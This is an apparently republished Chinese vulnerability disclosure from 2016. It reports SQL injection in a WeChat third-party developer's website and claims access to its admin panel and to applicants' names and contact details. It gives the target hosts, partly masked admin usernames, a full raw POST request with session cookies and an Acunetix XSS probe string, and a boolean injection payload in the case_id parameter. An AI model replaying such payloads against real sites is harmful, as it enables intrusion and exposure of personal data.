HanDs
管理员

[7月漏洞公开] 某微信第三方开发商官网存在SQL注入漏洞(可影响后台众多申请人代理人资料) 





学习中请遵循国家相关法律法规,黑客不作恶。没有网络安全就没有国家安全

本站需要登陆后才能查看

某微信第三方开发商官网存在SQL注入漏洞(可影响后台众多申请人代理人资料)

详细说明:

一个post注入,已经进后台了,admin.weiba66.com

账号密码

mask 区域
*****llen6*****
*****wangj*****





注入点

code 区域
POST /service/ajaxLink HTTP/1.1
Content-Length: 46
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Referer: http://www.weiba66.com:80/
Cookie: ag_session=IPQAQEpeOTjHpI5NJZ6jeopnuavvO%2F93HCWVgcDugTz4WxDk9aEp5Q07xY4ivjWFYPFpGabHpf4o4Nwa12CMyvuZvOHRbHOPxZH1Ls%2BCSCrQs%2BWP9j8GV9drOOTsqzNPD3numUHhOAnrHJ7TBxRerg%2FhTQOsnqORy3w1Viv6pOtchCjAC0ftC35%2FuYDp4qcC1eyZDF9ifIVV78lr8kp8SBCim0VMvXr%2F2AF%2F9giR0ZyNlrH%2FktmpPLOxg9xZHwV%2FuGVhw8JXDaMUMVkXvyTFEtt%2BILfEuSiXfyRp6L%2BymeZFd2sTNJi6pr2tDZPxh2Citp37EdPeukfx3iDu3CWm84DTRe3Zlx1%2BE3XzpROq2xlrHGB5ESJnEj7K62lRzVnAUPGZoT%2FdJzVs6PKX9i4iKCyevBOVjte%2BSR3GiSnKhXf83nrj5Wn5OX%2F6BIEOZTu0pZw9mYm%2B2AUxmQ%2BcQH2ZC8VDkY8JUgRXeNK88C5PtEaDCW0NjMcJo8Wp0sF7BFvW8z7%2F5no7DTLMtr3Cc9feU6JFZfta7qYBADJ2N%2FEFxAZrzulj9kNcpaC5JbY7%2F1WoGuKAOaowoFtzQZ%2BENyM5kQh5EfQQc6703g2cXyPvW%2F%2BuAD6BKu2Ui5jcRnZAydiY; Hm_lvt_7e0672c2bc0acf201df277a0e9268004=1463220277,1463220684,1463220776,1463220800; Hm_lpvt_7e0672c2bc0acf201df277a0e9268004=1463220800; CNZZDATA1253384856=462479786-1463217860-http%253A%252F%252Fwww.acunetix-referrer.com%252F%7C1463217860; _jzqx=1.1463218977.1463218977.1.jzqsr=acunetix-referrer%2Ecom|jzqct=/javascript:domxssexecutionsink(0,"'\"><xsstag>()refdxss").-; _jzqckmp=1; _jzqa=1.920430318093333200.1463218844.1463218844.1463218844.1; _jzqc=1; _qzja=1.1925184389.1463218844224.1463218844224.1463218844224.1463220400516.1463220400638.0.0.0.15.1; _qzjb=1.1463218844224.15.0.0.0; _qzjc=1; _qzjto=15.1.0; _jzqb=1.10.10.1463218844.1; HMACCOUNT=A4D7CEFE20A00F10; qv_swfrfh=; qv_swfrfc=v20; qv_swfrfu=; v=ADM^ifaQD9:6yw9%wV%D; web_session=a%3A5%3A%7Bs%3A10%3A%22session_id%22%3Bs%3A32%3A%225ce3b840d839df336f657de0c795ffc5%22%3Bs%3A10%3A%22ip_address%22%3Bs%3A14%3A%2214.121.122.124%22%3Bs%3A10%3A%22user_agent%22%3Bs%3A107%3A%22Mozilla%2F5.0+%28Windows+NT+6.1%3B+WOW64%29+AppleWebKit%2F537.21+%28KHTML%2C+like+Gecko%29+Chrome%2F41.0.2228.0+Safari%2F537.21%22%3Bs%3A13%3A%22last_activity%22%3Bi%3A1463219209%3Bs%3A9%3A%22user_data%22%3Bs%3A0%3A%22%22%3B%7De6d8af05e9ecf42f2fe88aa12a2800ca; Hm_lvt_5a4ba5491f78d218dd191f1bdc025828=1463219220; Hm_lpvt_5a4ba5491f78d218dd191f1bdc025828=1463219220; bdshare_firstime=1463219544832; BAIDUID=D53A2A20AD43D3236488985893BC8197:FG=1; cna=seW9D7eKfzYCAQ55enzgKzuC; sca=dab3f7a4; atpsida=d5293f1b9f17e8bb1fa59193_1463220145
Host: www.weiba66.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21
Accept: */*

case_id=86%20AND%203*2*1%3d6%20AND%20105%3d105



case_id参数有问题

1.png



2.png



3.png





泄露众多申请人联系方式姓名

4.png

5.png



6.png



7.png



8.png

漏洞证明:

1.png



2.png



3.png



4.png

5.png



6.png



7.png



8.png

修复方案:

我比较菜你们自己弄下吧


学习中请遵守法律法规,本网站内容均来自于互联网,本网站不负担法律责任
第三方 开发商 存在 S QL
#1楼
发帖时间:2016-7-9   |   查看数:0   |   回复数:0
游客组
快速回复